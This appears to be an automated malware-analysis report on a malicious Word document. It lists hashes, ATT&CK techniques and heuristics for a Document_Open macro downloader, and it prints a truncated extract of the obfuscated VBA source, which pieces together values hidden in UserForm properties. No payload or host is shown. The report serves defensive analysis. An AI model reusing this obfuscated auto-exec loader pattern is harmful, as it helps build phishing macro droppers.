Office (OLE) malware analysis — malicious · 75b3e8ecff0075db

MALICIOUS

Office (OLE)

205.6 KB Created: 2019-12-19 21:05:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: ab1385b5711ba0a53974214110428fc8 SHA-1: 36bceb99f72540e1e432e13156260f89ba6b1370 SHA-256: 75b3e8ecff0075dbf1714a95d4316d9a56ada3547050ffc8a9035ca531ff6460

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The heuristics indicate a hidden command stager using CreateObject and GetObject, suggesting the macro's primary purpose is to download and execute a second-stage payload. No specific family could be identified due to heavy obfuscation.

Heuristics 7

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13392 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13392 bytes
SHA-256: `38cf4d50ecacb7d0bb242c2364b2b05e7317bc4599d558f8ffd0427ddb2f8fe3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ruvkgjsqtr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Hezfrszq, 0, 0, MSForms, TextBox" Private Sub Document_open() Skycwkpci = "Cora" Dim Ywmkoflfue As String Dim Tcyqtmnmljjkd As Boolean Rmspslkbhki = ("Mario") Dim Rvnawlezxt As Boolean Dim Vizpnchfqtt As String Dim Eojbqgkucuq As Integer Ordpusxzxc = Uibmtycllr Dim Ygnkvsnitdnp As String Zadohlyp = ("Sint et modi culpa consequuntur explicabo temporibus.") Dim Jhiwokxwuiqne As Double Dim Eocsqulks As String Dim Hxklxikp As Double Kqtifqvtkmv = "Provident facere error." Dim Cwvwgdywqx As Boolean Dim Amjkhcpm As Integer Dim Xijkdqrhmfrn As Integer Bmelcqttggf = ("Ex rerum cum at.") Dim Icjfetiymm As String Ifilhlne = 673 Vyejaaecdf = Jfdzmtzp Jlulliyu = 980 Bmahzapaao Gwnnqgygmwrmx = "Stacy" Dim Ysskxfckhnefe As Double Dim Ayfemaslk As Double Dttrvvpkrlcy = ("Delectus.") Dim Dmgzlautdvsg As String Dim Xggipebjrp As String Dim Ptwwyzekio As Integer Yuykpxyodd = Ftjwsuvqhc Dim Whxtcidi As Double Jvgqttrdgmgl = ("Sherry") Dim Qhrntvewj As Boolean Dim Izfmvzepkjn As Integer Dim Abyewyuk As Boolean Cvqqozrnlicl = "Doris" Dim Qlmbwhucqp As Double Dim Wzzlddsgcrej As Integer Dim Swcizohnnll As Double Iyaebcwcrnz = ("Repellat voluptatibus libero ut et quis cumque minus.") Dim Tnizgdlfoyaip As String Jmoalojhcn = 870 Tobicdaut = Eigiuaavmel Zzslkfgld = 691 End Sub Attribute VB_Name = "Utrxlvrcwebx" Attribute VB_Base = "0{44902B8D-FE4B-40A4-A71A-5DFA625349E6}{AF1793FC-1227-4761-AB84-326CC0CA1598}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Qowdfpxoitqoe" Function Nvoyfforo() Orpfwvwxinwx = "Ducimus saepe tempore voluptatum qui delectus consequatur." Dim Opqvyigw As Integer Dim Yhadzwmloaa As Double Mxxzroyzayf = ("Est id explicabo iusto.") Dim Wzqbksxbhout As Integer Dim Aljrzeadxb As Boolean Dim Hvnyivefznu As Double Imnficftcxo = Fuutborvk Dim Jgzosnmqxcr As Integer Ypzdvexyhb = ("Ab id et quos.") Dim Kgmfutxjzw As Integer Dim Rapkxten As Boolean Dim Ulpoafepb As Integer Eigalciuim = "Rerum." Dim Vmupnbowchc As Double Dim Pgtrejuw As Integer Dim Sijmqvtuvry As Boolean Gqronigx = ("Enim.") Dim Avwpcdciqbzb As Boolean Oyainhtc = 688 Mbnuhooqn = Rtgrqsjhsc Oaohxjybxz = 107 Mxlvbkqxgs = Ruvkgjsqtr.Hezfrszq Itktfviwlihh = "Et." Dim Liqshnyhwfpfo As Boolean Dim Hdgovaaljtmzi As Double Tpgcdpryv = ("Micheal") Dim Bxedzgszefbt As Double Dim Kwgzuopqomzzm As Boolean Dim Pelycydhf As Double Gimcrwfcs = Zabdljseat Dim Pbquybgpbfoi As Integer Lvcuktoe = ("Cupiditate expedita.") Dim Wynuobtmzp As Double Dim Bcgbmcjt As Integer Dim Whxxbgjmekwg As String Nmbzmbir = "Delectus quam." Dim Tanjhlulxc As Integer Dim Wramdmlmf As Integer Dim Fnzbkgll As String Mdbsafsq = ("Sunt iure ut.") Dim Vyipkzzyv As Integer Fyxhwhkjemrx = 20 Nzudhtwumh = Krlgnpyih Kexhggve = 196 Vfoktdxt = Mxlvbkqxgs + Utrxlvrcwebx.Kfgmtxjpok + Utrxlvrcwebx.Frmtpwekuc + Utrxlvrcwebx.Yqiuhqigvwmvg Amjxievzf = "Dolorum aut." Dim Iggwwlfx As Integer Dim Ruhpunod As Boolean Uvyujvdy = ("Soluta ut quia.") Dim Mmcpphol As Double Dim Djueisbh As Boolean Dim Gvqnimhmnbhh As Boolean Pfrsznydbmxka = Quvkctrvoh Dim Cxbuwfxpdajha As String Ueqymnzw = ("A incidunt.") Dim Wcdxjclxnv As Integer Dim Sbedejqlnjipw As Integer Dim Jqlcbvizdurtx As Boolean Nxxulotijq = "Jared" Dim Ymtnbrecgbse As Double Dim Bajmpsndwl As Integer Dim Gjpicmva As Double Kgqctvelet = ("Sunt rerum perspiciatis.") Dim Nszwanhu As Boolean Vzlumxzgi = 480 Oqdwnzry = Ylgwwiflh Wckqrzjgmxl = 989 Bgksabrr = Vfoktdxt + Utrxlvrcwebx.Nddadnpnghp + Utrxlvrcwebx.Sulyqhueyptu.Factoid Kyozfgcx = "Est odit rem. ... (truncated)

SHA-256: 38cf4d50ecacb7d0bb242c2364b2b05e7317bc4599d558f8ffd0427ddb2f8fe3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Ruvkgjsqtr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Hezfrszq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Skycwkpci = "Cora"
Dim Ywmkoflfue As String
Dim Tcyqtmnmljjkd As Boolean
Rmspslkbhki = ("Mario")
Dim Rvnawlezxt As Boolean
Dim Vizpnchfqtt As String
Dim Eojbqgkucuq As Integer
Ordpusxzxc = Uibmtycllr
Dim Ygnkvsnitdnp As String
Zadohlyp = ("Sint et modi culpa consequuntur explicabo temporibus.")
Dim Jhiwokxwuiqne As Double
Dim Eocsqulks As String
Dim Hxklxikp As Double
Kqtifqvtkmv = "Provident facere error."
Dim Cwvwgdywqx As Boolean
Dim Amjkhcpm As Integer
Dim Xijkdqrhmfrn As Integer
Bmelcqttggf = ("Ex rerum cum at.")
Dim Icjfetiymm As String
Ifilhlne = 673
Vyejaaecdf = Jfdzmtzp
Jlulliyu = 980
Bmahzapaao
   Gwnnqgygmwrmx = "Stacy"
Dim Ysskxfckhnefe As Double
Dim Ayfemaslk As Double
Dttrvvpkrlcy = ("Delectus.")
Dim Dmgzlautdvsg As String
Dim Xggipebjrp As String
Dim Ptwwyzekio As Integer
Yuykpxyodd = Ftjwsuvqhc
Dim Whxtcidi As Double
Jvgqttrdgmgl = ("Sherry")
Dim Qhrntvewj As Boolean
Dim Izfmvzepkjn As Integer
Dim Abyewyuk As Boolean
Cvqqozrnlicl = "Doris"
Dim Qlmbwhucqp As Double
Dim Wzzlddsgcrej As Integer
Dim Swcizohnnll As Double
Iyaebcwcrnz = ("Repellat voluptatibus libero ut et quis cumque minus.")
Dim Tnizgdlfoyaip As String
Jmoalojhcn = 870
Tobicdaut = Eigiuaavmel
Zzslkfgld = 691
End Sub

Attribute VB_Name = "Utrxlvrcwebx"
Attribute VB_Base = "0{44902B8D-FE4B-40A4-A71A-5DFA625349E6}{AF1793FC-1227-4761-AB84-326CC0CA1598}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Qowdfpxoitqoe"
Function Nvoyfforo()
   Orpfwvwxinwx = "Ducimus saepe tempore voluptatum qui delectus consequatur."
Dim Opqvyigw As Integer
Dim Yhadzwmloaa As Double
Mxxzroyzayf = ("Est id explicabo iusto.")
Dim Wzqbksxbhout As Integer
Dim Aljrzeadxb As Boolean
Dim Hvnyivefznu As Double
Imnficftcxo = Fuutborvk
Dim Jgzosnmqxcr As Integer
Ypzdvexyhb = ("Ab id et quos.")
Dim Kgmfutxjzw As Integer
Dim Rapkxten As Boolean
Dim Ulpoafepb As Integer
Eigalciuim = "Rerum."
Dim Vmupnbowchc As Double
Dim Pgtrejuw As Integer
Dim Sijmqvtuvry As Boolean
Gqronigx = ("Enim.")
Dim Avwpcdciqbzb As Boolean
Oyainhtc = 688
Mbnuhooqn = Rtgrqsjhsc
Oaohxjybxz = 107
Mxlvbkqxgs = Ruvkgjsqtr.Hezfrszq
   Itktfviwlihh = "Et."
Dim Liqshnyhwfpfo As Boolean
Dim Hdgovaaljtmzi As Double
Tpgcdpryv = ("Micheal")
Dim Bxedzgszefbt As Double
Dim Kwgzuopqomzzm As Boolean
Dim Pelycydhf As Double
Gimcrwfcs = Zabdljseat
Dim Pbquybgpbfoi As Integer
Lvcuktoe = ("Cupiditate expedita.")
Dim Wynuobtmzp As Double
Dim Bcgbmcjt As Integer
Dim Whxxbgjmekwg As String
Nmbzmbir = "Delectus quam."
Dim Tanjhlulxc As Integer
Dim Wramdmlmf As Integer
Dim Fnzbkgll As String
Mdbsafsq = ("Sunt iure ut.")
Dim Vyipkzzyv As Integer
Fyxhwhkjemrx = 20
Nzudhtwumh = Krlgnpyih
Kexhggve = 196
Vfoktdxt = Mxlvbkqxgs + Utrxlvrcwebx.Kfgmtxjpok + Utrxlvrcwebx.Frmtpwekuc + Utrxlvrcwebx.Yqiuhqigvwmvg
   Amjxievzf = "Dolorum aut."
Dim Iggwwlfx As Integer
Dim Ruhpunod As Boolean
Uvyujvdy = ("Soluta ut quia.")
Dim Mmcpphol As Double
Dim Djueisbh As Boolean
Dim Gvqnimhmnbhh As Boolean
Pfrsznydbmxka = Quvkctrvoh
Dim Cxbuwfxpdajha As String
Ueqymnzw = ("A incidunt.")
Dim Wcdxjclxnv As Integer
Dim Sbedejqlnjipw As Integer
Dim Jqlcbvizdurtx As Boolean
Nxxulotijq = "Jared"
Dim Ymtnbrecgbse As Double
Dim Bajmpsndwl As Integer
Dim Gjpicmva As Double
Kgqctvelet = ("Sunt rerum perspiciatis.")
Dim Nszwanhu As Boolean
Vzlumxzgi = 480
Oqdwnzry = Ylgwwiflh
Wckqrzjgmxl = 989
Bgksabrr = Vfoktdxt + Utrxlvrcwebx.Nddadnpnghp + Utrxlvrcwebx.Sulyqhueyptu.Factoid
   Kyozfgcx = "Est odit rem.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.